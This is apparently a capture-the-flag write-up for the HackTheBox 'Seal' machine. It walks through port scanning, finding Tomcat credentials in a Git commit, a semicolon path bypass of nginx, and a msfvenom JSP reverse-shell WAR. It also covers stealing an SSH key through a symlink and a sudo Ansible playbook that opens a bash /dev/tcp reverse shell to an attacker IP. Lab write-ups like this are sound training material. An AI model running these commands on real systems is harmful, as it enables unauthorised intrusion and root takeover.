Skip to content

Latest commit

 

History

History
171 lines (92 loc) · 3.27 KB

README.md

File metadata and controls

171 lines (92 loc) · 3.27 KB
Raw

Seal

nmap -p- --min-rate 10000 10.10.10.250 -Pn

Alt text

After detection of open ports (22,443,8080), we can do greater nmap scan.

nmap -A -sC -sV -p22,443,8080 10.10.10.250

Alt text

While I browse the application, it redirects into 'seal.htb' , that's why I add this into '/etc/hosts' file.

Alt text

Let's access application on port (8080), that's Gitbucket.

Alt text

I create an account and try to enumerate for finding sensitive credentials.

Dr4ks:Dr4ks

I can see seal_market's repository is here.

Alt text

I find sensitive credentials from latest commits.

Alt text

tomcat:42MrHBf*z8{Z%

While I want to access Tomcat manager via browsing /manager/html, nginx blocks this action, to bypass this, I add ;(semicolon).

Alt text

After bypass and successful authentication, I see Tomcat manager section. url=> /manager;/html

Alt text

To get reverse shelll, I need to upload malicious .war file, let's create this by using msfvenom command.

msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o dr4ks.war

Alt text

There are a lot of erros comes about uploading, we need to add upload processing like below. URL=> /manager/.;/html should be.

Alt text

While clicking to my dr4ks endpoint, I got reverse shell from port (1337).

Alt text

Let's make interactive shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

Alt text

While enumeration, I found two backup files (zipped) on location '/opt/backups/archives'.

Let's get one of them.

1.First, open http server via python.

python3 -m http.server --bind 10.10.10.250 3169

Alt text

2.Then grab files by visiting URL.

Alt text

These backup files are generated by Ansible, so that they have information from generated (are the same stuff)

I also know that one writeable folder ./uploads, let's create link from luis folder via ln command.

ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/

After this, playbooks works also our link worked.

Alt text

Let's grab this big data.

I extract all data from here like below.

gunzip -d .gz file
tar -xvf extracted file

Here's private key (id_rsa) file, I change privileges of this and connect into machine.

Alt text

chmod 600 id_rsa
ssh -i id_rsa luis@10.10.10.250

user.txt

Alt text

While I doing sudo -l command for privilege escalation, it says playbook is privileged action for luis user.

Alt text

I will exploit by creating this playbook .yaml file.

- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.16.6/2024 0>&1'

Then run this playbook file.

sudo ansible-playbook dr4ks.yml

Alt text

I got reverse shell from port (2024).

root.txt

Alt text